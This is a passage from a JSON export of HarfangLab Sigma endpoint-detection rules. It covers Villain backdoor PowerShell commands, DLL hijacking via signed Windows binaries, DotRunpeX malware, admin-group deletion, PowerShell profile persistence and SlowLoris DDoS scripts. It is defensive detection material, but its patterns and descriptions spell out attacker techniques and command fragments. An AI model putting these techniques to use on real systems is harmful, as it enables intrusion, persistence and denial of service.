"https://github.com/t3l3machus/Villain",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1059_001_powershell_villain_backdoor_obfuscated.yml",
"content": "title: Suspicious PowerShell Obfuscated Command linked to Villain\nid: 4e359ad0-b742-4cbb-b891-6e4324df0c1f\ndescription: |\n Detects PowerShell commands executing a Villain-obfuscated payload.\n Villain is a Windows & Linux backdoor generator and multi-session handler.\n The framework allows attackers to instantiate shells and control other machines running Villain in the network.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://github.com/t3l3machus/Villain\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/12/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1132.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Villain\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '$*$*/????????'\n - '$env:COMPUTERNAME'\n - '$env:USERNAME'\n - '-Method POST'\n - '-Headers @{Authorization='\n - '-ur? $*$*/????????'\n - '-join'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e359ad0-b742-4cbb-b891-6e4324df0c1f",
"rule_name": "Suspicious PowerShell Obfuscated Command linked to Villain",
"rule_description": "Detects PowerShell commands executing a Villain-obfuscated payload.\nVillain is a Windows & Linux backdoor generator and multi-session handler.\nThe framework allows attackers to instantiate shells and control other machines running Villain in the network.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e41f7ae-28b5-46f8-a490-18dd0a687c26",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622974Z",
"creation_date": "2026-03-23T11:45:34.622976Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622980Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1531/"
],
"name": "t1531_delete_user_from_administrators_group.yml",
"content": "title: User Administrators Group Deleted via net.exe\nid: 4e41f7ae-28b5-46f8-a490-18dd0a687c26\ndescription: |\n Detects the execution of net command to delete a user from an administrators group.\n Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n This can hamper recovery actions and render access difficult to infected machines.\n It is recommended to investigate the process at the origin of the execution of the \"net\" command to determine whether this action is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1531/\ndate: 2021/12/21\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1531\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n\n selection_group:\n CommandLine|contains:\n - ' localgroup '\n - ' group '\n - ' groups '\n\n # Matches administrators, administrateurs, domain admin, ...\n selection_admin:\n CommandLine|contains: 'admin'\n\n selection_deletion:\n CommandLine|contains:\n - '/delete'\n - '/del'\n - '\\delete'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Windows\\CCM\\TSMBootstrap.exe'\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenworksWindowsService.exe'\n - '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n\n exclusion_schedule:\n ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e41f7ae-28b5-46f8-a490-18dd0a687c26",
"rule_name": "User Administrators Group Deleted via net.exe",
"rule_description": "Detects the execution of net command to delete a user from an administrators group.\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nThis can hamper recovery actions and render access difficult to infected machines.\nIt is recommended to investigate the process at the origin of the execution of the \"net\" command to determine whether this action is legitimate.\n",
"rule_creation_date": "2021-12-21",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1531"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e751948-6a09-4460-963e-1bc188aad0ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594615Z",
"creation_date": "2026-03-23T11:45:34.594618Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594626Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_certutil.yml",
"content": "title: DLL Hijacking via certutil.exe\nid: 4e751948-6a09-4460-963e-1bc188aad0ae\ndescription: |\n Detects potential Windows DLL Hijacking via certutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'certutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\certcli.dll'\n - '\\CRYPTUI.dll'\n - '\\DSROLE.DLL'\n - '\\LOGONCLI.DLL'\n - '\\ncrypt.dll'\n - '\\netapi32.dll'\n - '\\NETUTILS.DLL'\n - '\\NTDSAPI.dll'\n - '\\SAMCLI.DLL'\n - '\\secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e751948-6a09-4460-963e-1bc188aad0ae",
"rule_name": "DLL Hijacking via certutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via certutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e8149a4-c0a1-4afd-abbf-ca10b45c941a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592521Z",
"creation_date": "2026-03-23T11:45:34.592525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592532Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdechangepin.yml",
"content": "title: DLL Hijacking via bdechangepin.exe\nid: 4e8149a4-c0a1-4afd-abbf-ca10b45c941a\ndescription: |\n Detects potential Windows DLL Hijacking via bdechangepin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdechangepin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e8149a4-c0a1-4afd-abbf-ca10b45c941a",
"rule_name": "DLL Hijacking via bdechangepin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bdechangepin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e8d2d23-6207-41ca-81a0-179883d4ed44",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604169Z",
"creation_date": "2026-03-23T11:45:34.604172Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604180Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/",
"https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1055_012_dotrunpex_malware.yml",
"content": "title: DotRunpeX Malware Executed\nid: 4e8d2d23-6207-41ca-81a0-179883d4ed44\ndescription: |\n Detects the execution of the DotRunpeX malware.\n DotRunpeX is a .NET injector which is usually part of a second-stage infection.\n It is used to deliver numerous malware families and it is based on a custom version of KoiVM for obfuscation.\n It is recommended to examine the process tree associated with this process to try and identify which malware was delivered, as well as to try to determine the original source of infection.\nreferences:\n - https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/\n - https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2023/09/18\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.DotRunpeX\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Product|contains: 'RunpeX.Stub.Framework'\n - OriginalFileName|contains: 'RunpeX.Stub.Framework'\n - Description|contains: 'RunpeX.Stub.Framework'\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e8d2d23-6207-41ca-81a0-179883d4ed44",
"rule_name": "DotRunpeX Malware Executed",
"rule_description": "Detects the execution of the DotRunpeX malware.\nDotRunpeX is a .NET injector which is usually part of a second-stage infection.\nIt is used to deliver numerous malware families and it is based on a custom version of KoiVM for obfuscation.\nIt is recommended to examine the process tree associated with this process to try and identify which malware was delivered, as well as to try to determine the original source of infection.\n",
"rule_creation_date": "2023-09-18",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e92ac72-e71c-4853-84f1-57cb55968cd8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072614Z",
"creation_date": "2026-03-23T11:45:34.072616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072620Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7",
"https://attack.mitre.org/techniques/T1546/013/"
],
"name": "t1546_013_persistence_powershell_profile.yml",
"content": "title: PowerShell Profile Created\nid: 4e92ac72-e71c-4853-84f1-57cb55968cd8\ndescription: |\n Detects creation of a PowerShell profile.\n PowerShell profile can be create to customize the user environment and add session-specific elements to every PowerShell session started.\n Attackers may use this file to establish persistence.\n It is recommended to investigate the context of this action to determine if the creation of the PowerShell profile is legitimate. It can be useful to use a job to download the PowerShell profile to look for malicious content.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7\n - https://attack.mitre.org/techniques/T1546/013/\ndate: 2020/09/29\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.013\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection_host_program:\n Path|endswith:\n - '\\Documents\\PowerShell\\\\*_profile.ps1'\n - '\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n\n selection_default:\n Path|endswith:\n - '\\Documents\\PowerShell\\profile.ps1'\n - '\\Documents\\WindowsPowerShell\\profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n\n exclusion_miniconda:\n ProcessCommandLine|contains|all:\n - 'miniconda3\\python.exe'\n - 'miniconda3\\scripts\\conda-script.py init'\n\n exclusion_anaconda:\n ProcessCommandLine|contains|all:\n - '\\anaconda3\\python.exe'\n - '\\anaconda3\\scripts\\conda-script.py init'\n\n exclusion_qnap:\n ProcessImage: '?:\\Program Files (x86)\\QNAP\\Qsync\\Qsync.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'QNAP Systems, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e92ac72-e71c-4853-84f1-57cb55968cd8",
"rule_name": "PowerShell Profile Created",
"rule_description": "Detects creation of a PowerShell profile.\nPowerShell profile can be create to customize the user environment and add session-specific elements to every PowerShell session started.\nAttackers may use this file to establish persistence.\nIt is recommended to investigate the context of this action to determine if the creation of the PowerShell profile is legitimate. It can be useful to use a job to download the PowerShell profile to look for malicious content.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.013"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4ea564c3-ba6c-41f7-a7e4-a7cea8da78bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609659Z",
"creation_date": "2026-03-23T11:45:34.609663Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609670Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/",
"https://github.com/maxkrivich/SlowLoris",
"https://github.com/StanGirard/SlowLoris-DDOS-Attack",
"https://github.com/0xc0d/Slow-Loris",
"https://github.com/GHubgenius/slowloris.pl",
"https://attack.mitre.org/techniques/T1499/002/"
],
"name": "t1498_slowloris_script_execution_windows.yml",
"content": "title: SlowLoris Script Execution (Windows)\nid: 4ea564c3-ba6c-41f7-a7e4-a7cea8da78bd\ndescription: |\n Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\n SlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\n It is recommended to analyze the script parameters to determine the target of the SlowLoris attack and to verify that the script execution is not part of an internal test.\nreferences:\n - https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/\n - https://github.com/maxkrivich/SlowLoris\n - https://github.com/StanGirard/SlowLoris-DDOS-Attack\n - https://github.com/0xc0d/Slow-Loris\n - https://github.com/GHubgenius/slowloris.pl\n - https://attack.mitre.org/techniques/T1499/002/\ndate: 2023/09/19\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1499.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.SlowLoris\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains:\n - 'slowloris.pl'\n - 'slowloris '\n - 'slowloris.py'\n\n # There is another rule for cloning\n filter_github:\n CommandLine|contains:\n - ' clone '\n - 'github'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4ea564c3-ba6c-41f7-a7e4-a7cea8da78bd",
"rule_name": "SlowLoris Script Execution (Windows)",
"rule_description": "Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\nSlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\nIt is recommended to analyze the script parameters to determine the target of the SlowLoris attack and to verify that the script execution is not part of an internal test.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1499.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4eb48a02-5752-4310-8937-54480b3a681e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081623Z",
"creation_date": "2026-03-23T11:45:34.081625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081629Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msg.yml",
"content": "title: DLL Hijacking via msg.exe\nid: 4eb48a02-5752-4310-8937-54480b3a681e\ndescription: |\n Detects potential Windows DLL Hijacking via msg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4eb48a02-5752-4310-8937-54480b3a681e",
"rule_name": "DLL Hijacking via msg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4ef873a0-9d40-4498-85a3-d1610a041785",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587899Z",
"creation_date": "2026-03-23T11:45:34.587902Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587910Z",
"rule_level": "high",
"rule_confidence": "strong",
